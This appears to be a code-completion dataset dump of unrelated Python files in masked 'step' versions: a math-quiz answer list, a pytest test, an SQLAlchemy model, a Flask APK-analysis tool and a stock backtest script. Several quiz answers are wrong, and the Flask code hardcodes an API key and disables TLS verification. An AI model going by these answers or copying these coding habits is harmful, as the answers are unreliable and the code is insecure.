"step-3": "Easy = [[\"4 + 12 = ?\", 16],\r\n [\"45 -34 = ?\", 11],\r\n [\"27 + 12 -18 = ?\", 21],\r\n ['25 - 5 * 4 = ?', 5],\r\n [\"18 + 45 / 5 - 3 * 2 = ?\", 21],\r\n [\"5! = ?\", 120],\r\n [\"3! + 2! = ?\", 8],\r\n [\"7 + 5! / 4! - 6 / 3 = ?\", 10],\r\n [\"(25 + 5) / 6 * 4 = ?\", 20],\r\n [\"4(3+c)+c=c+4; c=?\", -2],\r\n [\"√121 = ?\" ,11],\r\n [\"x = √81 - √64; x= ?\", 1],\r\n [\"x + y = 20; x - y = 4; y = ?\", 8]]\r\n\r\nNormal = [[\"8(10−k)=2k; k = ?\", 8],\r\n [\"−4n−8=4(−3n+2); n=?\", 2],\r\n [\"4(3+c)+c=c+4; c=?\", -2],\r\n [\"√121 = ?\" ,11],\r\n [\"x = √81 - √64; x= ?\", 1],\r\n [\"y = √16 * √4 / √9; y=?\", 2],\r\n [\"y−3=2(x+1); x= -2, y=?\", 1],\r\n [\" y*y = 4x/5 − 11; y= 5, x = ?\", 45],\r\n [\"How many unique ways are there to arrange the letters in the word CANNON?\", 120],\r\n [\"How many numbers between 1 and 100(inclusive) are divisible by 10 or 7\", 23],\r\n [\"y=−4x+6; 3x+4y=-2 ; x=?\", 2],\r\n [\"−x+4y=−9; y=−2x-9; y=?\", -3]]\r\n\r\nHard = [[\"Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?\", 20],\r\n [\"You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?\", 10],\r\n [\"Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?\", 126],\r\n [\"How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?\" ,67],\r\n [\"You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\", 12],\r\n [\"You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\", 2],\r\n [\"y−3=2(x+1); x= -2, y=?\", 48],\r\n [\"How many unique ways are there to arrange the letters in the word CANNON?\", 120],\r\n [\"How many numbers between 1 and 100(inclusive) are divisible by 10 or 7\", 23],\r\n [\"−x+4y=−9; y=−2x-9; y=?\", -3],\r\n [\"x = √81 - √64; x= ?\", 1],\r\n [\"y = √16 * √4 / √9; y=?\", 2],\r\n [\"y−3=2(x+1); x= -2, y=?\", 1],\r\n [\" y*y = 4x/5 − 11; y= 5, x = ?\", 45],\r\n [\"y=−4x+6; 3x+4y=-2 ; x=?\", 2],\r\n [\"−x+4y=−9; y=−2x-9; y=?\", -3]]\r\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import pytest
import sys
sys.path.insert(0, '..')
from task_05 import task5
def test_mults():
assert task5.mults(3, 5, 10) == 23
assert task5.mults(5, 3, 10) == 23
assert task5.mults(3, 2, 10) == 32
assert task5.mults(7, 8, 50) == 364
|
normal
|
{
"blob_id": "1c8622167240243da05a241e3630f79cdf36d7a8",
"index": 4776,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_mults():\n assert task5.mults(3, 5, 10) == 23\n assert task5.mults(5, 3, 10) == 23\n assert task5.mults(3, 2, 10) == 32\n assert task5.mults(7, 8, 50) == 364\n",
"step-3": "<mask token>\nsys.path.insert(0, '..')\n<mask token>\n\n\ndef test_mults():\n assert task5.mults(3, 5, 10) == 23\n assert task5.mults(5, 3, 10) == 23\n assert task5.mults(3, 2, 10) == 32\n assert task5.mults(7, 8, 50) == 364\n",
"step-4": "import pytest\nimport sys\nsys.path.insert(0, '..')\nfrom task_05 import task5\n\n\ndef test_mults():\n assert task5.mults(3, 5, 10) == 23\n assert task5.mults(5, 3, 10) == 23\n assert task5.mults(3, 2, 10) == 32\n assert task5.mults(7, 8, 50) == 364\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from __future__ import annotations
from typing import TYPE_CHECKING
from datetime import datetime
from sqlalchemy import Column, ForeignKey, String, DateTime, Float, Integer
from sqlalchemy.orm import relationship
from app.db.base_class import Base
if TYPE_CHECKING:
from .account import Account # noqa: F401
from .code import Code # noqa: F401
class Voucher(Base):
__tablename__ = 't_juju_voucher'
code = Column(String(100), index=True, unique=True)
serial_no = Column(String(120), index=True, unique=True)
amount = Column(Float, default=0, nullable=False)
vtime = Column(DateTime(), nullable=False)
vtype = Column(String(50), ForeignKey("t_juju_code.vtype"))
comment = Column(String(150), nullable=True)
create_time = Column(DateTime(), default=datetime.now)
update_time = Column(DateTime(), default=datetime.now,
onupdate=datetime.now)
owner_id = Column(Integer, ForeignKey("t_juju_account.id"))
modifier_id = Column(Integer, ForeignKey("t_juju_account.id"))
|
normal
|
{
"blob_id": "60d8276a5715899823b12ffdf132925c6f2693bd",
"index": 8675,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Voucher(Base):\n __tablename__ = 't_juju_voucher'\n code = Column(String(100), index=True, unique=True)\n serial_no = Column(String(120), index=True, unique=True)\n amount = Column(Float, default=0, nullable=False)\n vtime = Column(DateTime(), nullable=False)\n vtype = Column(String(50), ForeignKey('t_juju_code.vtype'))\n comment = Column(String(150), nullable=True)\n create_time = Column(DateTime(), default=datetime.now)\n update_time = Column(DateTime(), default=datetime.now, onupdate=\n datetime.now)\n owner_id = Column(Integer, ForeignKey('t_juju_account.id'))\n modifier_id = Column(Integer, ForeignKey('t_juju_account.id'))\n",
"step-3": "<mask token>\nif TYPE_CHECKING:\n from .account import Account\n from .code import Code\n\n\nclass Voucher(Base):\n __tablename__ = 't_juju_voucher'\n code = Column(String(100), index=True, unique=True)\n serial_no = Column(String(120), index=True, unique=True)\n amount = Column(Float, default=0, nullable=False)\n vtime = Column(DateTime(), nullable=False)\n vtype = Column(String(50), ForeignKey('t_juju_code.vtype'))\n comment = Column(String(150), nullable=True)\n create_time = Column(DateTime(), default=datetime.now)\n update_time = Column(DateTime(), default=datetime.now, onupdate=\n datetime.now)\n owner_id = Column(Integer, ForeignKey('t_juju_account.id'))\n modifier_id = Column(Integer, ForeignKey('t_juju_account.id'))\n",
"step-4": "from __future__ import annotations\nfrom typing import TYPE_CHECKING\nfrom datetime import datetime\nfrom sqlalchemy import Column, ForeignKey, String, DateTime, Float, Integer\nfrom sqlalchemy.orm import relationship\nfrom app.db.base_class import Base\nif TYPE_CHECKING:\n from .account import Account\n from .code import Code\n\n\nclass Voucher(Base):\n __tablename__ = 't_juju_voucher'\n code = Column(String(100), index=True, unique=True)\n serial_no = Column(String(120), index=True, unique=True)\n amount = Column(Float, default=0, nullable=False)\n vtime = Column(DateTime(), nullable=False)\n vtype = Column(String(50), ForeignKey('t_juju_code.vtype'))\n comment = Column(String(150), nullable=True)\n create_time = Column(DateTime(), default=datetime.now)\n update_time = Column(DateTime(), default=datetime.now, onupdate=\n datetime.now)\n owner_id = Column(Integer, ForeignKey('t_juju_account.id'))\n modifier_id = Column(Integer, ForeignKey('t_juju_account.id'))\n",
"step-5": "from __future__ import annotations\n\n\nfrom typing import TYPE_CHECKING\nfrom datetime import datetime\n\nfrom sqlalchemy import Column, ForeignKey, String, DateTime, Float, Integer\nfrom sqlalchemy.orm import relationship\n\nfrom app.db.base_class import Base\n\nif TYPE_CHECKING:\n from .account import Account # noqa: F401\n from .code import Code # noqa: F401\n\n\nclass Voucher(Base):\n __tablename__ = 't_juju_voucher'\n code = Column(String(100), index=True, unique=True)\n serial_no = Column(String(120), index=True, unique=True)\n amount = Column(Float, default=0, nullable=False)\n vtime = Column(DateTime(), nullable=False)\n\n vtype = Column(String(50), ForeignKey(\"t_juju_code.vtype\"))\n\n comment = Column(String(150), nullable=True)\n create_time = Column(DateTime(), default=datetime.now)\n update_time = Column(DateTime(), default=datetime.now,\n onupdate=datetime.now)\n\n owner_id = Column(Integer, ForeignKey(\"t_juju_account.id\"))\n modifier_id = Column(Integer, ForeignKey(\"t_juju_account.id\"))\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import base64
import json
import os
import re
import subprocess
import time
import traceback
import zipfile
from datetime import datetime
import requests
from flask import request, current_app
from library.oss import oss_upload_monkey_package_picture
from public_config import TCLOUD_FILE_TEMP_PATH
class ToolBusiness(object):
@classmethod
def get_tool_ip(cls):
ip = request.args.get('ip')
url = 'http://api.map.baidu.com/location/ip'
params = {"ip": ip, "ak": 'kqCYLKt8Uz9VnvHBXA7uOI51FIrei0OM'}
ret = requests.get(url=url, params=params)
ret = json.loads(ret.content)
if ret and 'status' in ret and ret['status'] == 0 and 'content' in ret and 'address' in ret:
return ret['status'], ret['content'], ret['address'], 'ok'
return 101, '', '', '获取失败'
@classmethod
def apk_analysis(cls, apk_download_url, type=1):
try:
# type 1 : not save , 2: save to db
target_path = "/tmp/packages/"
if not os.path.exists(target_path):
os.mkdir(target_path)
date_time_now = datetime.now().strftime('%Y%m%d-%H.%M.%S')
target_name = '{}.apk'.format(date_time_now)
download_apk_name = os.path.join(target_path, target_name)
current_app.logger.info('开始从 {} 下载到 {}'.format(apk_download_url, download_apk_name))
response = requests.get(url=apk_download_url, verify=False)
with open(download_apk_name, 'wb') as f:
f.write(response.content)
time.sleep(0.5)
# 下载失败
if not os.path.exists(download_apk_name):
current_app.logger.error('{} 下载失败!'.format(apk_download_url))
return 102, "下载失败"
current_app.logger.info('下载成功,保存地址 {}'.format(download_apk_name))
current_app.logger.info('开始分析')
package_info_re = re.compile(r"package: name='(.*)' versionCode='(.*)' versionName='(.*?)'.*", re.I)
label_icon_re = re.compile(r"application: label='(.+)'.*icon='(.+)'", re.I)
launchable_activity_re = re.compile(r"launchable-activity: name='(.+)'.*label.*", re.I)
apk_info = {}
cmd = '/usr/local/bin/aapt dump badging {}'.format(download_apk_name)
command_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
infos = command_process.stdout.readlines()
for info in infos:
info = info.decode('utf-8')
if info.startswith('package:'):
temp = package_info_re.search(info)
apk_info['package_name'] = temp.group(1)
apk_info['version_code'] = temp.group(2) or 0
apk_info['version_name'] = temp.group(3)
elif info.startswith('application:'):
temp = label_icon_re.search(info)
apk_info['label'] = temp.group(1)
apk_info['icon'] = temp.group(2)
elif info.startswith('launchable-activity:'):
temp = launchable_activity_re.search(info)
apk_info['default_activity'] = temp.group(1)
try:
size = round(os.path.getsize(download_apk_name) / float(1024 * 1024), 2)
apk_info['size'] = str(size)
zip = zipfile.ZipFile(download_apk_name)
icon_binary = zip.read(apk_info['icon'])
time_now = datetime.now().strftime('%Y%m%d.%H%M%S')
picture = f'monkey-{time_now}.png'
dir_path = f'{TCLOUD_FILE_TEMP_PATH}/monkey'
if not os.path.exists(TCLOUD_FILE_TEMP_PATH):
os.mkdir(TCLOUD_FILE_TEMP_PATH)
if not os.path.exists(dir_path):
os.mkdir(dir_path)
with open(f'{dir_path}/{picture}', 'wb') as f:
f.write(icon_binary)
apk_info['icon'] = oss_upload_monkey_package_picture(dir_path, picture)
except Exception as e:
current_app.logger.warning(e)
current_app.logger.warning(traceback.format_exc())
current_app.logger.info(apk_info)
if type == 1:
pass
elif type == 2:
pass
return apk_info
except Exception as e:
current_app.logger.error(e)
current_app.logger.error(traceback.format_exc())
return {}
|
normal
|
{
"blob_id": "bf45349a9fdfcef7392c477e089c5e3916cb4c8e",
"index": 8502,
"step-1": "<mask token>\n\n\nclass ToolBusiness(object):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ToolBusiness(object):\n\n @classmethod\n def get_tool_ip(cls):\n ip = request.args.get('ip')\n url = 'http://api.map.baidu.com/location/ip'\n params = {'ip': ip, 'ak': 'kqCYLKt8Uz9VnvHBXA7uOI51FIrei0OM'}\n ret = requests.get(url=url, params=params)\n ret = json.loads(ret.content)\n if ret and 'status' in ret and ret['status'\n ] == 0 and 'content' in ret and 'address' in ret:\n return ret['status'], ret['content'], ret['address'], 'ok'\n return 101, '', '', '获取失败'\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ToolBusiness(object):\n\n @classmethod\n def get_tool_ip(cls):\n ip = request.args.get('ip')\n url = 'http://api.map.baidu.com/location/ip'\n params = {'ip': ip, 'ak': 'kqCYLKt8Uz9VnvHBXA7uOI51FIrei0OM'}\n ret = requests.get(url=url, params=params)\n ret = json.loads(ret.content)\n if ret and 'status' in ret and ret['status'\n ] == 0 and 'content' in ret and 'address' in ret:\n return ret['status'], ret['content'], ret['address'], 'ok'\n return 101, '', '', '获取失败'\n\n @classmethod\n def apk_analysis(cls, apk_download_url, type=1):\n try:\n target_path = '/tmp/packages/'\n if not os.path.exists(target_path):\n os.mkdir(target_path)\n date_time_now = datetime.now().strftime('%Y%m%d-%H.%M.%S')\n target_name = '{}.apk'.format(date_time_now)\n download_apk_name = os.path.join(target_path, target_name)\n current_app.logger.info('开始从 {} 下载到 {}'.format(apk_download_url,\n download_apk_name))\n response = requests.get(url=apk_download_url, verify=False)\n with open(download_apk_name, 'wb') as f:\n f.write(response.content)\n time.sleep(0.5)\n if not os.path.exists(download_apk_name):\n current_app.logger.error('{} 下载失败!'.format(apk_download_url))\n return 102, '下载失败'\n current_app.logger.info('下载成功,保存地址 {}'.format(download_apk_name))\n current_app.logger.info('开始分析')\n package_info_re = re.compile(\n \"package: name='(.*)' versionCode='(.*)' versionName='(.*?)'.*\"\n , re.I)\n label_icon_re = re.compile(\"application: label='(.+)'.*icon='(.+)'\"\n , re.I)\n launchable_activity_re = re.compile(\n \"launchable-activity: name='(.+)'.*label.*\", re.I)\n apk_info = {}\n cmd = '/usr/local/bin/aapt dump badging {}'.format(\n download_apk_name)\n command_process = subprocess.Popen(cmd, shell=True, stdout=\n subprocess.PIPE, stderr=subprocess.STDOUT)\n infos = command_process.stdout.readlines()\n for info in infos:\n info = info.decode('utf-8')\n if info.startswith('package:'):\n temp = package_info_re.search(info)\n apk_info['package_name'] = temp.group(1)\n apk_info['version_code'] = temp.group(2) or 0\n apk_info['version_name'] = temp.group(3)\n elif info.startswith('application:'):\n temp = label_icon_re.search(info)\n apk_info['label'] = temp.group(1)\n apk_info['icon'] = temp.group(2)\n elif info.startswith('launchable-activity:'):\n temp = launchable_activity_re.search(info)\n apk_info['default_activity'] = temp.group(1)\n try:\n size = round(os.path.getsize(download_apk_name) / float(\n 1024 * 1024), 2)\n apk_info['size'] = str(size)\n zip = zipfile.ZipFile(download_apk_name)\n icon_binary = zip.read(apk_info['icon'])\n time_now = datetime.now().strftime('%Y%m%d.%H%M%S')\n picture = f'monkey-{time_now}.png'\n dir_path = f'{TCLOUD_FILE_TEMP_PATH}/monkey'\n if not os.path.exists(TCLOUD_FILE_TEMP_PATH):\n os.mkdir(TCLOUD_FILE_TEMP_PATH)\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n with open(f'{dir_path}/{picture}', 'wb') as f:\n f.write(icon_binary)\n apk_info['icon'] = oss_upload_monkey_package_picture(dir_path,\n picture)\n except Exception as e:\n current_app.logger.warning(e)\n current_app.logger.warning(traceback.format_exc())\n current_app.logger.info(apk_info)\n if type == 1:\n pass\n elif type == 2:\n pass\n return apk_info\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return {}\n",
"step-4": "import base64\nimport json\nimport os\nimport re\nimport subprocess\nimport time\nimport traceback\nimport zipfile\nfrom datetime import datetime\nimport requests\nfrom flask import request, current_app\nfrom library.oss import oss_upload_monkey_package_picture\nfrom public_config import TCLOUD_FILE_TEMP_PATH\n\n\nclass ToolBusiness(object):\n\n @classmethod\n def get_tool_ip(cls):\n ip = request.args.get('ip')\n url = 'http://api.map.baidu.com/location/ip'\n params = {'ip': ip, 'ak': 'kqCYLKt8Uz9VnvHBXA7uOI51FIrei0OM'}\n ret = requests.get(url=url, params=params)\n ret = json.loads(ret.content)\n if ret and 'status' in ret and ret['status'\n ] == 0 and 'content' in ret and 'address' in ret:\n return ret['status'], ret['content'], ret['address'], 'ok'\n return 101, '', '', '获取失败'\n\n @classmethod\n def apk_analysis(cls, apk_download_url, type=1):\n try:\n target_path = '/tmp/packages/'\n if not os.path.exists(target_path):\n os.mkdir(target_path)\n date_time_now = datetime.now().strftime('%Y%m%d-%H.%M.%S')\n target_name = '{}.apk'.format(date_time_now)\n download_apk_name = os.path.join(target_path, target_name)\n current_app.logger.info('开始从 {} 下载到 {}'.format(apk_download_url,\n download_apk_name))\n response = requests.get(url=apk_download_url, verify=False)\n with open(download_apk_name, 'wb') as f:\n f.write(response.content)\n time.sleep(0.5)\n if not os.path.exists(download_apk_name):\n current_app.logger.error('{} 下载失败!'.format(apk_download_url))\n return 102, '下载失败'\n current_app.logger.info('下载成功,保存地址 {}'.format(download_apk_name))\n current_app.logger.info('开始分析')\n package_info_re = re.compile(\n \"package: name='(.*)' versionCode='(.*)' versionName='(.*?)'.*\"\n , re.I)\n label_icon_re = re.compile(\"application: label='(.+)'.*icon='(.+)'\"\n , re.I)\n launchable_activity_re = re.compile(\n \"launchable-activity: name='(.+)'.*label.*\", re.I)\n apk_info = {}\n cmd = '/usr/local/bin/aapt dump badging {}'.format(\n download_apk_name)\n command_process = subprocess.Popen(cmd, shell=True, stdout=\n subprocess.PIPE, stderr=subprocess.STDOUT)\n infos = command_process.stdout.readlines()\n for info in infos:\n info = info.decode('utf-8')\n if info.startswith('package:'):\n temp = package_info_re.search(info)\n apk_info['package_name'] = temp.group(1)\n apk_info['version_code'] = temp.group(2) or 0\n apk_info['version_name'] = temp.group(3)\n elif info.startswith('application:'):\n temp = label_icon_re.search(info)\n apk_info['label'] = temp.group(1)\n apk_info['icon'] = temp.group(2)\n elif info.startswith('launchable-activity:'):\n temp = launchable_activity_re.search(info)\n apk_info['default_activity'] = temp.group(1)\n try:\n size = round(os.path.getsize(download_apk_name) / float(\n 1024 * 1024), 2)\n apk_info['size'] = str(size)\n zip = zipfile.ZipFile(download_apk_name)\n icon_binary = zip.read(apk_info['icon'])\n time_now = datetime.now().strftime('%Y%m%d.%H%M%S')\n picture = f'monkey-{time_now}.png'\n dir_path = f'{TCLOUD_FILE_TEMP_PATH}/monkey'\n if not os.path.exists(TCLOUD_FILE_TEMP_PATH):\n os.mkdir(TCLOUD_FILE_TEMP_PATH)\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n with open(f'{dir_path}/{picture}', 'wb') as f:\n f.write(icon_binary)\n apk_info['icon'] = oss_upload_monkey_package_picture(dir_path,\n picture)\n except Exception as e:\n current_app.logger.warning(e)\n current_app.logger.warning(traceback.format_exc())\n current_app.logger.info(apk_info)\n if type == 1:\n pass\n elif type == 2:\n pass\n return apk_info\n except Exception as e:\n 
current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return {}\n",
"step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport base64\nimport json\nimport os\nimport re\nimport subprocess\nimport time\nimport traceback\nimport zipfile\nfrom datetime import datetime\n\nimport requests\nfrom flask import request, current_app\n\nfrom library.oss import oss_upload_monkey_package_picture\nfrom public_config import TCLOUD_FILE_TEMP_PATH\n\n\nclass ToolBusiness(object):\n\n @classmethod\n def get_tool_ip(cls):\n ip = request.args.get('ip')\n\n url = 'http://api.map.baidu.com/location/ip'\n params = {\"ip\": ip, \"ak\": 'kqCYLKt8Uz9VnvHBXA7uOI51FIrei0OM'}\n ret = requests.get(url=url, params=params)\n ret = json.loads(ret.content)\n\n if ret and 'status' in ret and ret['status'] == 0 and 'content' in ret and 'address' in ret:\n return ret['status'], ret['content'], ret['address'], 'ok'\n\n return 101, '', '', '获取失败'\n\n @classmethod\n def apk_analysis(cls, apk_download_url, type=1):\n try:\n # type 1 : not save , 2: save to db\n target_path = \"/tmp/packages/\"\n if not os.path.exists(target_path):\n os.mkdir(target_path)\n\n date_time_now = datetime.now().strftime('%Y%m%d-%H.%M.%S')\n target_name = '{}.apk'.format(date_time_now)\n\n download_apk_name = os.path.join(target_path, target_name)\n\n current_app.logger.info('开始从 {} 下载到 {}'.format(apk_download_url, download_apk_name))\n\n response = requests.get(url=apk_download_url, verify=False)\n\n with open(download_apk_name, 'wb') as f:\n f.write(response.content)\n\n time.sleep(0.5)\n # 下载失败\n if not os.path.exists(download_apk_name):\n current_app.logger.error('{} 下载失败!'.format(apk_download_url))\n return 102, \"下载失败\"\n\n current_app.logger.info('下载成功,保存地址 {}'.format(download_apk_name))\n current_app.logger.info('开始分析')\n\n package_info_re = re.compile(r\"package: name='(.*)' versionCode='(.*)' versionName='(.*?)'.*\", re.I)\n label_icon_re = re.compile(r\"application: label='(.+)'.*icon='(.+)'\", re.I)\n launchable_activity_re = re.compile(r\"launchable-activity: name='(.+)'.*label.*\", re.I)\n\n apk_info = {}\n\n cmd = '/usr/local/bin/aapt dump badging {}'.format(download_apk_name)\n\n command_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n infos = command_process.stdout.readlines()\n\n for info in infos:\n info = info.decode('utf-8')\n if info.startswith('package:'):\n temp = package_info_re.search(info)\n apk_info['package_name'] = temp.group(1)\n apk_info['version_code'] = temp.group(2) or 0\n apk_info['version_name'] = temp.group(3)\n elif info.startswith('application:'):\n temp = label_icon_re.search(info)\n apk_info['label'] = temp.group(1)\n apk_info['icon'] = temp.group(2)\n elif info.startswith('launchable-activity:'):\n temp = launchable_activity_re.search(info)\n apk_info['default_activity'] = temp.group(1)\n\n try:\n size = round(os.path.getsize(download_apk_name) / float(1024 * 1024), 2)\n apk_info['size'] = str(size)\n zip = zipfile.ZipFile(download_apk_name)\n icon_binary = zip.read(apk_info['icon'])\n time_now = datetime.now().strftime('%Y%m%d.%H%M%S')\n picture = f'monkey-{time_now}.png'\n dir_path = f'{TCLOUD_FILE_TEMP_PATH}/monkey'\n\n if not os.path.exists(TCLOUD_FILE_TEMP_PATH):\n os.mkdir(TCLOUD_FILE_TEMP_PATH)\n\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n with open(f'{dir_path}/{picture}', 'wb') as f:\n f.write(icon_binary)\n\n apk_info['icon'] = oss_upload_monkey_package_picture(dir_path, picture)\n except Exception as e:\n current_app.logger.warning(e)\n current_app.logger.warning(traceback.format_exc())\n\n 
current_app.logger.info(apk_info)\n\n if type == 1:\n pass\n elif type == 2:\n pass\n\n return apk_info\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return {}\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/python
import sys
import itertools as it
pop_list = []
#with open("/Users/dashazhernakova/Documents/Doby/GenomeRussia/ancientDNA/GR+Lazaridis.ind") as f:
with open(sys.argv[1]) as f:
[pop_list.append(l.strip().split("\t")[2]) for l in f if l.strip().split("\t")[2] not in pop_list]
triplets = it.combinations(pop_list, 3)
for a,b,c in triplets:
print a + "\t" + b + "\t" + c + "\tMbuti.DG"
|
normal
|
{
"blob_id": "de7cd231aceb2700acb3ecafe36d1ba1f5c1643b",
"index": 6191,
"step-1": "#!/usr/bin/python\nimport sys\nimport itertools as it\n\npop_list = []\n\n#with open(\"/Users/dashazhernakova/Documents/Doby/GenomeRussia/ancientDNA/GR+Lazaridis.ind\") as f:\nwith open(sys.argv[1]) as f:\n\t[pop_list.append(l.strip().split(\"\\t\")[2]) for l in f if l.strip().split(\"\\t\")[2] not in pop_list]\n\ntriplets = it.combinations(pop_list, 3)\nfor a,b,c in triplets:\n\tprint a + \"\\t\" + b + \"\\t\" + c + \"\\tMbuti.DG\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from datareader import *
import matplotlib.pyplot as plt
from plotting import *
from misc import *
import leastSquares as lsModel
import masim as mAvgSim
import numpy as np
import pandas as pd
import statistics as stat
from datetime import datetime as dt
from time import mktime
def main():
# scrape_data(pd.read_csv('china_stocks.csv'),location='chineseStocks/',
# start='2019-09-16',end='2020-11-12')
# cypt_scrape = backtest_database('LINK-USD','2019-09-16','2020-11-12',1)
# cypt_scrape.create_csv('/Users/jimmylin/Desktop/Quant_Trading/Trading/')
# df_stock = pd.read_csv('603131.csv')
# df_cypt = pd.read_csv('LINK-USD.csv')
# df_stock = backtest_database('603993.SS','2019-09-16','2020-11-17',1).read_csv(location='chineseStocks/')
# sim = mAvgSim.movingAverageSim(df_stock)
# sim = mAvgSim.movingAverageSim(df_cypt)
# net,num_trades,test_error = sim.run_simulation(ndays=15)
# sim.plot_graph()
# test_stock_list(stock_list=pd.read_csv('china_stocks.csv'),location='chineseStocks/',ndays=4)
daily_signal_checker('china_stocks.csv',location='chineseStocks/')
# update_open_close('china_stocks.csv',location='chineseStocks/')
# tmp = backtest_database('300261.SZ','2019-09-16','2020-02-16',1)
# df_stock = tmp.read_csv('chineseStocks/')
# open_price = tmp.get_today_open()
# df_stock = df_stock.append({'Open' : open_price},ignore_index=True)
# sim = mAvgSim.movingAverageSim(df_stock)
# sim.run_simulation(ndays=5)
# signals = sim.produce_buy_sell(ndays=1)
# print(signals)
def update_portfolio():
portfolio = pd.read_csv(portfolio)
def daily_signal_checker(stocks,location):
ndays=6
# Get updated stock prices (whole csv)
# scrape_data(pd.read_csv(stocks),location='chineseStocks/',
# start='2019-09-16',end='2020-11-24')
# Run through stock list to get opens and predict
stock_list = pd.read_csv(stocks)
for code in stock_list['Code']:
tmp = backtest_database(code,'2019-09-16','2020-11-18',1)
df_stock = tmp.read_csv(location=location)
open_price = float(tmp.get_today_open())
# print(code)
print(open_price)
df_stock = df_stock.append({'Open' : open_price},ignore_index=True)
sim = mAvgSim.movingAverageSim(df_stock)
signals = sim.produce_buy_sell(ndays=ndays)
print("Company:",code,
"Signals:",signals)
def scrape_data(stock_list,location,start,end):
for code in stock_list['Code']:
print("Got Code:",code)
tmp = backtest_database(code,start,end,1)
tmp.create_csv(location=location)
def test_stock_list(stock_list,location,ndays):
returns = pd.DataFrame(columns=['Company','No. Trades','Net return','Test Error'])
for code in stock_list['Code']:
print(code)
df_stock = backtest_database(code,'2019-09-16','2020-02-17',1).read_csv(location=location)
sim = mAvgSim.movingAverageSim(df_stock)
net,num_trades,test_error = sim.run_simulation(ndays=ndays)
if num_trades == 0:
continue
returns = returns.append({
'Company' : code,
'No. Trades' : num_trades,
'Net return' : net,
'Test Error' : test_error
},ignore_index=True)
# print('Company:',code,'\n Number of Trades',num_trades,'\n Net % return',net)
print("Mean Test Error = ", np.mean(returns['Test Error']))
net_profit = np.sum(returns['Net return'])
companies_traded = len(returns)
mean = stat.mean(returns['Net return'])
std = stat.stdev(returns['Net return'])
print("Net Profit =",net_profit,
'\n Total number of companies traded =',companies_traded,
'\n Mean Profit =',mean,
'\n Standard Deviation',std)
print(returns)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "8d5e652fda3fb172e6faab4153bca8f78c114cd1",
"index": 7973,
"step-1": "<mask token>\n\n\ndef main():\n daily_signal_checker('china_stocks.csv', location='chineseStocks/')\n\n\n<mask token>\n\n\ndef daily_signal_checker(stocks, location):\n ndays = 6\n stock_list = pd.read_csv(stocks)\n for code in stock_list['Code']:\n tmp = backtest_database(code, '2019-09-16', '2020-11-18', 1)\n df_stock = tmp.read_csv(location=location)\n open_price = float(tmp.get_today_open())\n print(open_price)\n df_stock = df_stock.append({'Open': open_price}, ignore_index=True)\n sim = mAvgSim.movingAverageSim(df_stock)\n signals = sim.produce_buy_sell(ndays=ndays)\n print('Company:', code, 'Signals:', signals)\n\n\ndef scrape_data(stock_list, location, start, end):\n for code in stock_list['Code']:\n print('Got Code:', code)\n tmp = backtest_database(code, start, end, 1)\n tmp.create_csv(location=location)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n daily_signal_checker('china_stocks.csv', location='chineseStocks/')\n\n\n<mask token>\n\n\ndef daily_signal_checker(stocks, location):\n ndays = 6\n stock_list = pd.read_csv(stocks)\n for code in stock_list['Code']:\n tmp = backtest_database(code, '2019-09-16', '2020-11-18', 1)\n df_stock = tmp.read_csv(location=location)\n open_price = float(tmp.get_today_open())\n print(open_price)\n df_stock = df_stock.append({'Open': open_price}, ignore_index=True)\n sim = mAvgSim.movingAverageSim(df_stock)\n signals = sim.produce_buy_sell(ndays=ndays)\n print('Company:', code, 'Signals:', signals)\n\n\ndef scrape_data(stock_list, location, start, end):\n for code in stock_list['Code']:\n print('Got Code:', code)\n tmp = backtest_database(code, start, end, 1)\n tmp.create_csv(location=location)\n\n\ndef test_stock_list(stock_list, location, ndays):\n returns = pd.DataFrame(columns=['Company', 'No. Trades', 'Net return',\n 'Test Error'])\n for code in stock_list['Code']:\n print(code)\n df_stock = backtest_database(code, '2019-09-16', '2020-02-17', 1\n ).read_csv(location=location)\n sim = mAvgSim.movingAverageSim(df_stock)\n net, num_trades, test_error = sim.run_simulation(ndays=ndays)\n if num_trades == 0:\n continue\n returns = returns.append({'Company': code, 'No. Trades': num_trades,\n 'Net return': net, 'Test Error': test_error}, ignore_index=True)\n print('Mean Test Error = ', np.mean(returns['Test Error']))\n net_profit = np.sum(returns['Net return'])\n companies_traded = len(returns)\n mean = stat.mean(returns['Net return'])\n std = 